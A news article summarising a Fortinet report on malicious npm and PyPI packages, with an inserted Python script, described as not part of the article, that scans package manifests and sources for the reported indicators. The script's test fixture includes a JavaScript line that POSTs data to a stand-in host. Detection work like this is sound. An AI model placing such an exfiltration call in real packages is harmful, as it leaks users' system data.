Surge in Malicious Software Packages Exploits System Flaws


Security researchers have detected a rise in malicious software packages that exploit system vulnerabilities.

A new report, published by Fortinet today, analyzes threats observed from November 2024 onward, revealing how attackers deploy lightweight, obfuscated packages to infiltrate systems undetected.

The research identified multiple malicious software packages, revealing various techniques used by attackers to evade detection and compromise systems:

  • 1082 packages featured low file counts, designed to minimize detection while executing harmful actions
  • 1052 packages contained install scripts that silently deployed malicious code
  • 1043 lacked repository URLs, making their origin and legitimacy hard to verify
  • 974 included suspicious URLs linked to command-and-control (C2) servers
  • 681 utilized APIs like https.get and https.request to exfiltrate data
  • 537 had empty descriptions, obscuring their true intent
  • 164 used excessively high version numbers to mislead users

Defense Bypass Tactics Used by Attackers

Attackers increasingly rely on methods like obfuscation, command overwrites and typosquatting to bypass traditional defenses.

Some malicious packages leverage suspicious install scripts, embedding API calls to transmit sensitive data to external servers. Others exploit missing metadata or repository URLs to evade scrutiny.
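As an added illustration (not code from the Fortinet report or from this article), the following Python script checks an npm package's manifest and source files for the indicators listed above: install scripts, missing repository URLs, empty descriptions, inflated version numbers, hardcoded URLs and https.get/https.request calls. The thresholds, the sample manifests and the webhook.example URL are constructed assumptions, not Fortinet's own rules.

```python
import json
import re

# Indicators taken from the Fortinet findings quoted above. Thresholds and
# pattern names are this example's assumptions, not Fortinet's own rules.
LOW_FILE_COUNT = 3              # assumption: 3 or fewer files counts as "low"
MAX_SANE_MAJOR = 50             # assumption: a major version above this is suspect
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
NET_CALL_RE = re.compile(r"\bhttps?\.(?:get|request)\s*\(")
URL_RE = re.compile(r"https?://[^\s'\"`)]+")


def audit_package(manifest: dict, sources: dict, file_count: int) -> list:
    """Return the names of the indicators that fire for one npm package.

    manifest:   parsed package.json
    sources:    {filename: file text} for the package's JS files
    file_count: number of files in the published tarball
    """
    findings = []
    if file_count <= LOW_FILE_COUNT:
        findings.append("low_file_count")
    hooks = [h for h in INSTALL_HOOKS if h in manifest.get("scripts", {})]
    if hooks:
        findings.append("install_script:" + ",".join(hooks))
    if not manifest.get("repository"):
        findings.append("missing_repository_url")
    if not (manifest.get("description") or "").strip():
        findings.append("empty_description")
    major = str(manifest.get("version", "0")).split(".")[0]
    if major.isdigit() and int(major) > MAX_SANE_MAJOR:
        findings.append("excessive_version")
    for name, text in sources.items():
        if NET_CALL_RE.search(text):
            findings.append("network_api:" + name)
        # Every hardcoded URL is surfaced for a reviewer to vet against
        # known-good hosts; the script does not decide which are C2.
        for url in URL_RE.findall(text):
            findings.append("hardcoded_url:" + url)
    return findings


# Constructed sample manifests and sources; not real packages.
SUSPECT_MANIFEST = json.loads('{"name": "example-pkg", "version": "99.6.0", '
                              '"description": "", "scripts": {"postinstall": "node index.js"}}')
SUSPECT_SOURCES = {"index.js": "const https = require('https');\n"
                   "https.request('https://webhook.example/collect', {method: 'POST'});\n"}
CLEAN_MANIFEST = {"name": "tidy-pkg", "version": "1.4.2", "description": "Parses CSV",
                  "repository": {"type": "git", "url": "https://git.example/tidy/tidy-pkg"}}
CLEAN_SOURCES = {"index.js": "module.exports = (s) => s.split(',');\n"}
```

Running audit_package(SUSPECT_MANIFEST, SUSPECT_SOURCES, 2) fires all seven indicators, while the clean sample with twelve files returns an empty list; in practice the manifest, sources and file count come from the unpacked registry tarball.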

Fortinet identified several high-risk packages, including:

  • AffineQuant-99.6 (Python), which utilized setup.py to exfiltrate system data, including MAC addresses and usernames
  • seller-admin-common_6.5.8 (Node.js), which harvested system details and transmitted them via a Discord webhook
  • xeno.dll_1.0.2 (JavaScript), which deployed a keylogger and backdoor for remote access, capturing passwords and credit card data

Strengthening Cyber Defenses

In the face of these threats, FortiGuard Labs emphasized that static detection alone is insufficient.

“Organizations should establish strong API discovery processes to achieve full visibility of their API environment, including shadow APIs that could be susceptible to attacks,” explained Eric Schwake, director of cybersecurity strategy at Salt Security.

“Effective API posture governance is essential to ensure that APIs are developed, deployed and managed with security as a priority, following best practices and industry standards.”

Jason Soroko, a senior fellow at Sectigo, echoed Schwake’s sentiment, adding that lean, obfuscated packages often slip past conventional security tools. 

“Conventional tools must adapt to detect subtle evasion techniques like command overwrites and typosquatting, while robust, adaptive defenses become critical in verifying software legitimacy amidst increasingly ambiguous threat landscapes,” Soroko said.

Organizations are urged to implement proactive security measures such as regular vulnerability scans, strict API governance and advanced threat monitoring tools to counter emerging cyber threats effectively.
